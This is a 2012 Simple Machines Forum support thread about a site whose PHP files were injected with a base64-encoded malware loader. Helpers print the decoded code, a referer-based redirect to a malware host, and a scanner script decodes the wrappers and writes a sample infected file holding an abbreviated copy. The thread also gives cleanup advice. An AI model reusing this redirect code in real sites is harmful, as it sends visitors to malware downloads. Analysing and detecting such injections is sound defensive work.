
All files been infected by virus?

Started by Hj Ahmad Rasyid Hj Ismail, October 12, 2012, 01:08:46 AM


Hj Ahmad Rasyid Hj Ismail

All my files in the server/host is infected by something I would like to think this as a virus. I know this could be the server/host problem and have contacted them. Still awaiting their reply on this.

This code was injected to all my SMF files:

eval(base64_decode("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"));


What can cause such an injection to all SMF files? How to stop it? Please advise.

Colin

Sorry to hear that. Take a look at just a few:

http://www.simplemachines.org/community/index.php?topic=480455.0
http://www.simplemachines.org/community/index.php?topic=480600.0
http://www.simplemachines.org/community/index.php?topic=469001.0

Here are the docs:
http://wiki.simplemachines.org/smf/How_to_check_permissions
http://wiki.simplemachines.org/smf/How_do_I_make_my_forum_safer_against_hacker_attacks


Here is the code that is being injected:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
            if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
                if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                    header("Location: http://dns-dns.dns-dns.com/");
                    exit();
                }
            }
        }
    }
}
"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Colin
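A defender-side scanner for the kind of injection shown above, added here as an example and not code from this thread or from SMF: it walks a forum tree, finds the eval(base64_decode("...")) wrappers, decodes each payload without executing it, and reports the redirect target and the markers of the conditional-redirect logic (headers_sent, HTTP_REFERER, HTTP_USER_AGENT, header("Location:")). The sample tree it builds, the file names in it and the abbreviated redirect logic are constructed for the demo.

```python
import base64
import re
import tempfile
from pathlib import Path
# The wrapper the thread shows in every infected file: eval(base64_decode("<payload>"));
WRAPPER_RE = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)')
# Markers of the decoded conditional-redirect logic quoted in the thread.
MARKERS = ("headers_sent", "HTTP_REFERER", "HTTP_USER_AGENT", 'header("Location:')
LOCATION_RE = re.compile(r'header\s*\(\s*["\']Location:\s*([^"\']+)["\']')

def decode_wrappers(source: str) -> list:
    """Decode every eval(base64_decode(...)) payload in a PHP source string; never executes it."""
    payloads = []
    for match in WRAPPER_RE.finditer(source):
        try:
            payloads.append(base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: bad alphabet or bad padding
            payloads.append("<undecodable>")
    return payloads

def analyse_file(path: Path):
    """Return findings for one file, or None when no wrapper is present."""
    payloads = decode_wrappers(path.read_text(errors="replace"))
    if not payloads:
        return None
    markers = sorted({m for p in payloads for m in MARKERS if m in p})
    redirects = [t for p in payloads for t in LOCATION_RE.findall(p)]
    return {"file": str(path), "wrappers": len(payloads), "markers": markers, "redirects": redirects}

def scan_tree(root: Path, suffixes=(".php",)) -> list:
    """Walk a forum tree and collect findings for every PHP file carrying a wrapper."""
    return [f for p in sorted(root.rglob("*")) if p.suffix in suffixes and (f := analyse_file(p))]

# Constructed sample: an abbreviated form of the redirect logic quoted above, wrapped the way it was injected.
REDIRECT_LOGIC = b'''error_reporting(0); $qazplm=headers_sent();
if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag and stristr($referer,"google")) { header("Location: http://dns-dns.dns-dns.com/"); exit(); } }'''

def build_sample_tree() -> Path:
    """Write one infected and one clean PHP file (hypothetical names) into a temp dir and return it."""
    root = Path(tempfile.mkdtemp(prefix="smf-scan-"))
    wrapper = 'eval(base64_decode("%s"));' % base64.b64encode(REDIRECT_LOGIC).decode()
    (root / "index.php").write_text("<?php " + wrapper + "\n// ... rest of the original file ...\n")
    (root / "Settings.php").write_text("<?php $boardurl = 'http://example.com/forum';\n")
    return root

if __name__ == "__main__":
    for finding in scan_tree(build_sample_tree()):
        print(finding)
```

Pointing scan_tree at the real forum root lists every file that still carries a wrapper, which is the double check worth doing after a cleanup or a restore from backup.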

mrintech

Check out following:

* http://sitecheck.sucuri.net/results/ahrasis.com/
* http://labs.sucuri.net/db/malware/malware-entry-mwblacklisted35
* http://blog.sucuri.net/2012/03/conditional-redirect-malware-decoded-evalbase64_decode-example.html

I think you need to clean this type of malware manually. If you have a clean backup, then restore your forum from that.

Also,

1. Change FTP/cPanel/WHM passwords
2. Check your .htaccess file for malicious code
3. Scan your PC
4. Open a support ticket with your webhost and ask them whether they can do anything about this. Sometimes, because of weak server security configuration, the attacker gains access and infects many websites.

Hope everything is going to be fine soon :)

mrintech

Quote from: Colin on October 12, 2012, 01:15:45 AM
Here is the code that is being injected:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
            if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
                if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                    header("Location: http://dns-dns.dns-dns.com/");
                    exit();
                }
            }
        }
    }
}


Very Nice


mrintech

The site downloads Trojan program: HEUR:Trojan.Script.Iframer

The malware directly goes to browser cache folder and this way it infects the machine

Hj Ahmad Rasyid Hj Ismail

I will make a more thorough check. Right now, all I know is that it has infected or has been injected into almost all files on the server/host. My password was rather long and tightly/highly secured. Some claim it is a vulnerability in the software, which is only SMF and a few mods (not more than 15). This was not there yesterday. So, there is no possibility that any of these mods could have been the cause.

On whether the browser, if infected with a virus, can cause all these, I would say it could. But the browsers I am using are FF15 and Chrome 22.0.1229.94, which is the latest. Could this be caused by Firebug with all the available options (including the alpha and beta) installed?

mrintech

Quote from: ahrasis on October 12, 2012, 02:24:57 AM

On whether the browser, if infected with a virus, can cause all these, I would say it could. But the browsers I am using are FF15 and Chrome 22.0.1229.94, which is the latest. Could this be caused by Firebug with all the available options (including the alpha and beta) installed?

Have you scanned all the machines you use for admin work on your forum?

Try scanning your full PC with Kaspersky and Malwarebytes Anti-Malware, with the latest definitions. If the malware has blocked security software from performing tasks, then you need to use Kaspersky Rescue Disk.

Some properties of above trojan are as follows:

Quote:
Slow down your PC speed notably.
Add other dangerous Trojan or Spyware to your system secretly.
Allow the hacker to access your entire system.
Collect all your personal information and transfer to a remote hacker.
Destroy critical system files and make PC unstable.

No matter how strong your password was, you need to change it.

Hj Ahmad Rasyid Hj Ismail

Quote from: mrintech on October 12, 2012, 02:49:56 AM
Have you scanned all the machines you use for admin work on your forum?
Am doing it as we speak.
Quote from: mrintech on October 12, 2012, 02:49:56 AM
No matter how strong your password was, you need to change it.
I am changing that too. Will schedule to do that every month from now on.

So far I have cleaned most of the files on my server/host. I just have to double check to make sure they are all clean. I guess the attack came from one of my Joomla sites. Sigh...

mrintech

One very important thing:

Disable your forum unless everything is sorted.

That referral based malware will be downloaded to every computer of your visitor. The malware directly goes to Browser Cache

I also got infected while testing for malware on your website

You need to make your forum Offline

Sorry, but it's necessary!

Hj Ahmad Rasyid Hj Ismail

That's a good idea. But I believe my server/host has restored all the clean files back to their places.

mrintech

Quote from: ahrasis on October 12, 2012, 03:05:43 AM
That's a good idea. But I believe my server/host has restored all the clean files back to their places.

As of now, I am also scanning my PC once again :(

Damn!

Edit:

I use Chrome and the malware was present in this folder: C:\Users\Mrinmay\AppData\Local\Google\Chrome\User Data\Default\

Hj Ahmad Rasyid Hj Ismail

Sorry for that mrintech. As of now I am setting my CloudFlare to "I'm under attack" mode. I hope this will help protecting all my files/sites on my server/host.

mrintech

Quote from: ahrasis on October 12, 2012, 03:18:14 AM
Sorry for that mrintech. As of now I am setting my CloudFlare to "I'm under attack" mode. I hope this will help protecting all my files/sites on my server/host.

No worries, I know how to deal with malware on my PC. It takes 3-4 hours to scan my PC as I have lots and lots of files, and this annoys me the most.

Hope everything is fine with your websites too :)

Hj Ahmad Rasyid Hj Ismail

They seem fine, for now. I was wrong. I'm still facing this problem. :-[

kat

This is a damned good thread, about this:

http://wordpress.org/support/topic/evalbase64_decode-hacked

I have to admit that, if I was in your place (I was, quite a while back), I might be tempted to replace all of the files with virgin files from the large upgrade archive.

(When I did mine, I went through every file, manually, removing the code. Defining a macro sped that up, a lot.)

But, as you intimated, your Wordpress files could be infected, too.

Hj Ahmad Rasyid Hj Ismail

I only have Joomla & SMF. It is easy for me to deal with SMF. I have various ways of doing it. But I have a problem with Joomla. I am planning to separate Joomla onto a different host/server in the future. One host, one software. Easy to find which one is hacked / compromised in the future. Having said that, hmmm... I will wait and see the full report later.

kat

Sorry, I meant Joomla. I was working on two topics and lost my thread, a bit.


Hj Ahmad Rasyid Hj Ismail

Quote from: K@ on October 14, 2012, 03:46:14 PM
Sorry, I meant Joomla. I was working on two topics and lost my thread, a bit.
Ah... It's nothing. I just finished reinstalling all backups. Site should be ok now...

XHIBIT911

Yup... I see you've fallen prey to the Black Hole exploit as well. That's a nasty virus if I've ever seen one, and it hides in dbase code.
